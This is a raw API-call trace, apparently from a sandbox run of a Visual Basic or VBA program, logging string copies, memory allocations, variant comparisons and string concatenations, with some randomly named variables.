[0060.699] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700816 | out: _Dst=0x874fba0) returned 0x0 [0060.699] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700816 | out: _Dst=0x345c9c) returned 0x0 [0060.699] CRetailMalloc_Free () returned 0x18460101 [0060.699] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x570083e | out: _Dst=0x87fc800) returned 0x0 [0060.699] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x570083e | out: _Dst=0x345c9c) returned 0x0 [0060.699] CRetailMalloc_Free () returned 0x7010201 [0060.700] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700862 | out: _Dst=0x87fc800) returned 0x0 [0060.700] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700862 | out: _Dst=0x345c9c) returned 0x0 [0060.700] CRetailMalloc_Free () returned 0x7010201 [0060.700] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700886 | out: _Dst=0x87fc800) returned 0x0 [0060.700] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700886 | out: _Dst=0x345c9c) returned 0x0 [0060.700] CRetailMalloc_Free () returned 0x7010201 [0060.701] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x57008aa | out: _Dst=0x87fc800) returned 0x0 [0060.701] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x57008aa | out: _Dst=0x345c9c) returned 0x0 [0060.701] CRetailMalloc_Free () returned 0x7010201 [0060.701] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x57008f6 | out: _Dst=0x87fc800) returned 0x0 [0060.701] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x57008f6 | out: _Dst=0x345c9c) returned 0x0 [0060.701] CRetailMalloc_Free () returned 0x7010201 [0060.702] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x57008ce | out: _Dst=0x87fc800) returned 0x0 [0060.702] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x57008ce | out: _Dst=0x345c9c) returned 0x0 [0060.702] CRetailMalloc_Free () returned 0x7010201 [0060.702] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x570091e | out: _Dst=0x874fba0) returned 0x0 [0060.702] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x570091e | out: _Dst=0x345c9c) returned 0x0 [0060.702] CRetailMalloc_Free () returned 0x18460101 [0060.703] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700946 | out: _Dst=0x874fba0) returned 0x0 [0060.704] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700946 | out: _Dst=0x345c9c) returned 0x0 [0060.704] CRetailMalloc_Free () returned 0x18460101 [0060.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570096e, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="zKRdM8s") returned 8 [0060.704] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x570096e | out: _Dst=0x87fc800) returned 0x0 [0060.704] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x570096e | out: _Dst=0x345c9c) returned 0x0 [0060.704] CRetailMalloc_Free () returned 0x7010201 [0060.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700992, cbMultiByte=6, lpWideCharStr=0x345c24, cchWideChar=7 | out: lpWideCharStr="GDBCR") returned 6 [0060.705] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700992 | out: _Dst=0x87fc800) returned 0x0 [0060.705] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700992 | out: _Dst=0x345c9c) returned 0x0 [0060.705] CRetailMalloc_Free () returned 0x7010201 [0060.705] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x57009b6 | out: _Dst=0x874fba0) returned 0x0 [0060.705] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x57009b6 | out: _Dst=0x345c9c) returned 0x0 [0060.705] CRetailMalloc_Free () returned 0x18460101 [0060.706] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x57009de | out: _Dst=0x87fc800) returned 0x0 [0060.706] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x57009de | out: _Dst=0x345c9c) returned 0x0 [0060.706] CRetailMalloc_Free () returned 0x7010201 [0060.706] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x5700a02 | out: _Dst=0x87fc800) returned 0x0 [0060.706] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x5700a02 | out: _Dst=0x345c9c) returned 0x0 [0060.706] CRetailMalloc_Free () returned 0x7010201 [0060.707] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700a2a | out: _Dst=0x87fc800) returned 0x0 [0060.707] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700a2a | out: _Dst=0x345c9c) returned 0x0 [0060.707] CRetailMalloc_Free () returned 0x7010201 [0060.707] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700a4e | out: _Dst=0x87fc800) returned 0x0 [0060.707] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700a4e | out: _Dst=0x345c9c) returned 0x0 [0060.707] CRetailMalloc_Free () returned 0x7010201 [0060.708] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5700a72 | out: _Dst=0x87fc800) returned 0x0 [0060.708] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5700a72 | out: _Dst=0x345c9c) returned 0x0 [0060.708] CRetailMalloc_Free () returned 0x7010201 [0060.708] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700a96 | out: _Dst=0x87fc800) returned 0x0 [0060.708] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700a96 | out: _Dst=0x345c9c) returned 0x0 [0060.708] CRetailMalloc_Free () returned 0x7010201 [0060.708] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700aba | out: _Dst=0x87fc800) returned 0x0 [0060.709] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700aba | out: _Dst=0x345c9c) returned 0x0 [0060.709] CRetailMalloc_Free () returned 0x7010201 [0060.709] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5700b02 | out: _Dst=0x87fc800) returned 0x0 [0060.709] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5700b02 | out: _Dst=0x345c9c) returned 0x0 [0060.709] CRetailMalloc_Free () returned 0x7010201 [0060.709] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700ade | out: _Dst=0x87fc800) returned 0x0 [0060.710] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700ade | out: _Dst=0x345c9c) returned 0x0 [0060.710] CRetailMalloc_Free () returned 0x7010201 [0060.710] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700b26 | out: _Dst=0x874fba0) returned 0x0 [0060.710] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700b26 | out: _Dst=0x345c9c) returned 0x0 [0060.710] CRetailMalloc_Free () returned 0x18460101 [0060.710] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700b4e | out: _Dst=0x87fc800) returned 0x0 [0060.710] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea001a, cbMultiByte=15, lpWideCharStr=0x345c34, cchWideChar=16 | out: lpWideCharStr="_B_var_ruw1tx4") returned 15 [0060.711] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700b4e | out: _Dst=0x345c9c) returned 0x0 [0060.711] CRetailMalloc_Free () returned 0x7010201 [0060.711] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700b72 | out: _Dst=0x87fc800) returned 0x0 [0060.711] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700b72 | out: _Dst=0x345c9c) returned 0x0 [0060.711] CRetailMalloc_Free () returned 0x7010201 [0060.711] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700b96 | out: _Dst=0x87fc800) returned 0x0 [0060.711] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700b96 | out: _Dst=0x345c9c) returned 0x0 [0060.711] CRetailMalloc_Free () returned 0x7010201 [0060.711] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700bba | out: _Dst=0x874fba0) returned 0x0 [0060.712] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700bba | out: _Dst=0x345c9c) returned 0x0 [0060.712] CRetailMalloc_Free () returned 0x18460101 [0060.712] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700be2 | out: _Dst=0x87fc800) returned 0x0 [0060.712] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700be2 | out: _Dst=0x345c9c) returned 0x0 [0060.712] CRetailMalloc_Free () returned 0x7010201 [0060.712] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x5700c06 | out: _Dst=0x87fc800) returned 0x0 [0060.712] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x5700c06 | out: _Dst=0x345c9c) returned 0x0 [0060.712] CRetailMalloc_Free () returned 0x7010201 [0060.713] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700c2e | out: _Dst=0x87fc800) returned 0x0 [0060.713] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700c2e | out: _Dst=0x345c9c) returned 0x0 [0060.713] CRetailMalloc_Free () returned 0x7010201 [0060.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700c52, cbMultiByte=6, lpWideCharStr=0x345c24, cchWideChar=7 | out: lpWideCharStr="FHlPk") returned 6 [0060.713] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700c52 | out: _Dst=0x87fc800) returned 0x0 [0060.713] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700c52 | out: _Dst=0x345c9c) returned 0x0 [0060.713] CRetailMalloc_Free () returned 0x7010201 [0060.714] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700c76 | out: _Dst=0x874fba0) returned 0x0 [0060.714] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700c76 | out: _Dst=0x345c9c) returned 0x0 [0060.714] CRetailMalloc_Free () returned 0x18460101 [0060.714] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700c9e | out: _Dst=0x87fc800) returned 0x0 [0060.714] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700c9e | out: _Dst=0x345c9c) returned 0x0 [0060.714] CRetailMalloc_Free () returned 0x7010201 [0060.714] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700cc2 | out: _Dst=0x874fba0) returned 0x0 [0060.714] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700cc2 | out: _Dst=0x345c9c) returned 0x0 [0060.714] CRetailMalloc_Free () returned 0x18460101 [0060.715] CRetailMalloc_Realloc () returned 0x6201f30 [0060.715] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700cea | out: _Dst=0x874fba0) returned 0x0 [0060.715] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700cea | out: _Dst=0x345c9c) returned 0x0 [0060.715] CRetailMalloc_Free () returned 0x18460101 [0060.715] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5700d12 | out: _Dst=0x87fc800) returned 0x0 [0060.715] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5700d12 | out: _Dst=0x345c9c) returned 0x0 [0060.715] CRetailMalloc_Free () returned 0x7010201 [0060.715] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700d36 | out: _Dst=0x874fba0) returned 0x0 [0060.716] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700d36 | out: _Dst=0x345c9c) returned 0x0 [0060.716] CRetailMalloc_Free () returned 0x18460101 [0060.716] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700d5e | out: _Dst=0x87fc800) returned 0x0 [0060.716] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700d5e | out: _Dst=0x345c9c) returned 0x0 [0060.716] CRetailMalloc_Free () returned 0x7010201 [0060.716] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700d82 | out: _Dst=0x874fba0) returned 0x0 [0060.716] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700d82 | out: _Dst=0x345c9c) returned 0x0 [0060.716] CRetailMalloc_Free () returned 0x18460101 [0060.717] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5700daa | out: _Dst=0x87fc800) returned 0x0 [0060.717] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5700daa | out: _Dst=0x345c9c) returned 0x0 [0060.717] CRetailMalloc_Free () returned 0x7010201 [0060.717] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700dce | out: _Dst=0x874fba0) returned 0x0 [0060.717] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700dce | out: _Dst=0x345c9c) returned 0x0 [0060.717] CRetailMalloc_Free () returned 0x18460101 [0060.717] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700df6 | out: _Dst=0x87fc800) returned 0x0 [0060.717] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700df6 | out: _Dst=0x345c9c) returned 0x0 [0060.717] CRetailMalloc_Free () returned 0x7010201 [0060.718] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x5700e1a | out: _Dst=0x87fc800) returned 0x0 [0060.718] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x5700e1a | out: _Dst=0x345c9c) returned 0x0 [0060.718] CRetailMalloc_Free () returned 0x7010201 [0060.718] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700e42 | out: _Dst=0x874fba0) returned 0x0 [0060.718] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700e42 | out: _Dst=0x345c9c) returned 0x0 [0060.718] CRetailMalloc_Free () returned 0x18460101 [0060.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700e6a, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="fEtBXH") returned 7 [0060.718] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5700e6a | out: _Dst=0x87fc800) returned 0x0 [0060.719] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5700e6a | out: _Dst=0x345c9c) returned 0x0 [0060.719] CRetailMalloc_Free () returned 0x7010201 [0060.719] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700eb2 | out: _Dst=0x874fba0) returned 0x0 [0060.719] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700eb2 | out: _Dst=0x345c9c) returned 0x0 [0060.719] CRetailMalloc_Free () returned 0x18460101 [0060.719] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700e8e | out: _Dst=0x87fc800) returned 0x0 [0060.719] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700e8e | out: _Dst=0x345c9c) returned 0x0 [0060.719] CRetailMalloc_Free () returned 0x7010201 [0060.720] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700eda | out: _Dst=0x87fc800) returned 0x0 [0060.720] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700eda | out: _Dst=0x345c9c) returned 0x0 [0060.720] CRetailMalloc_Free () returned 0x7010201 [0060.720] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700efe | out: _Dst=0x87fc800) returned 0x0 [0060.720] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700efe | out: _Dst=0x345c9c) returned 0x0 [0060.720] CRetailMalloc_Free () returned 0x7010201 [0060.720] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700f46 | out: _Dst=0x87fc800) returned 0x0 [0060.720] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700f46 | out: _Dst=0x345c9c) returned 0x0 [0060.720] CRetailMalloc_Free () returned 0x7010201 [0060.721] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700f22 | out: _Dst=0x87fc800) returned 0x0 [0060.721] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700f22 | out: _Dst=0x345c9c) returned 0x0 [0060.721] CRetailMalloc_Free () returned 0x7010201 [0060.721] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x5700f6a | out: _Dst=0x87fc800) returned 0x0 [0060.721] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x5700f6a | out: _Dst=0x345c9c) returned 0x0 [0060.721] CRetailMalloc_Free () returned 0x7010201 [0060.721] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700f92 | out: _Dst=0x87fc800) returned 0x0 [0060.721] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700f92 | out: _Dst=0x345c9c) returned 0x0 [0060.721] CRetailMalloc_Free () returned 0x7010201 [0060.722] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x5700fb6 | out: _Dst=0x87fc800) returned 0x0 [0060.722] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x5700fb6 | out: _Dst=0x345c9c) returned 0x0 [0060.722] CRetailMalloc_Free () returned 0x7010201 [0060.722] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700fde | out: _Dst=0x87fc800) returned 0x0 [0060.722] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700fde | out: _Dst=0x345c9c) returned 0x0 [0060.722] CRetailMalloc_Free () returned 0x7010201 [0060.722] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5701002 | out: _Dst=0x87fc800) returned 0x0 [0060.723] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5701002 | out: _Dst=0x345c9c) returned 0x0 [0060.723] CRetailMalloc_Free () returned 0x7010201 [0060.723] CRetailMalloc_Realloc () returned 0x87163e0 [0060.723] CRetailMalloc_Free () returned 0x1 [0060.723] CRetailMalloc_Realloc () returned 0x87fc800 [0060.723] CRetailMalloc_Realloc () returned 0x86bb6a0 [0060.723] CRetailMalloc_Free () returned 0x72e0201 [0060.724] CRetailMalloc_Realloc () returned 0x885b180 [0060.725] CRetailMalloc_Realloc () returned 0x885b180 [0060.725] CRetailMalloc_Realloc () returned 0x885b180 [0060.725] CRetailMalloc_Realloc () returned 0x885b180 [0060.725] CRetailMalloc_Realloc () returned 0x8724148 [0060.725] CRetailMalloc_Realloc () returned 0x885b180 [0060.725] CRetailMalloc_Realloc () returned 0x885b180 [0060.725] CRetailMalloc_Realloc () returned 0x885b180 [0060.725] CRetailMalloc_Realloc () returned 0x885b180 [0060.726] CRetailMalloc_Realloc () returned 0x885b180 [0060.726] CRetailMalloc_Realloc () returned 0x885b180 [0060.726] CRetailMalloc_Realloc () returned 0x885b180 [0060.726] CRetailMalloc_Free () returned 0x2fa0001 [0060.726] CRetailMalloc_Free () returned 0xb820101 [0060.726] CRetailMalloc_Alloc () returned 0x87fca10 [0060.726] CRetailMalloc_Free () returned 0x72e0201 [0060.726] CRetailMalloc_Free () returned 0xb820101 [0060.726] GetAsyncKeyState (vKey=3) returned 0 [0060.727] GetAsyncKeyState (vKey=3) returned 0 [0060.727] VarCmp (pvarLeft=0x3463fc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x3463fc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x3463fc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0060.727] VarCmp (pvarLeft=0x34638c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x34638c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x34638c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0060.727] VarCmp (pvarLeft=0x34633c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarBstrCat (in: bstrLeft="", bstrRight="-1071226506", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.727] VarCmp (pvarLeft=0x3462ec, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.727] VarCmp (pvarLeft=0x3462ac, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x3462ac, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x34626c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x34626c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x34622c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x34622c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x34622c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.727] VarCmp (pvarLeft=0x3461dc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarCmp (pvarLeft=0x3461dc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.727] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.728] VarCmp (pvarLeft=0x34617c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.728] VarBstrCat (in: bstrLeft="", bstrRight="46513.052769809", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.728] VarCmp (pvarLeft=0x34612c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.728] VarBstrCat (in: bstrLeft="", bstrRight="9196", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.728] VarCmp (pvarLeft=0x3460dc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.728] VarCmp (pvarLeft=0x3460dc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.728] VarCmp (pvarLeft=0x3460dc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.728] VarCmp (pvarLeft=0x34606c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.728] VarCmp (pvarLeft=0x34606c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.728] VarCmp (pvarLeft=0x34603c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.728] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.728] VarCmp (pvarLeft=0x345ffc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345ffc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345ffc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345f8c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345f4c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345f4c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345f4c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345edc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345edc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345edc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345e9c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.729] VarCmp (pvarLeft=0x345e4c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarCmp (pvarLeft=0x345e4c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.729] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.730] VarCmp (pvarLeft=0x345dfc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.730] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.730] VarCmp (pvarLeft=0x345dcc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.730] VarCmp (pvarLeft=0x345dcc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.730] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.730] VarCmp (pvarLeft=0x345d7c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.730] VarCmp (pvarLeft=0x345d7c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.730] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.730] VarCmp (pvarLeft=0x345d2c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.730] VarCmp (pvarLeft=0x345d2c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.730] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.731] VarCmp (pvarLeft=0x345cbc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 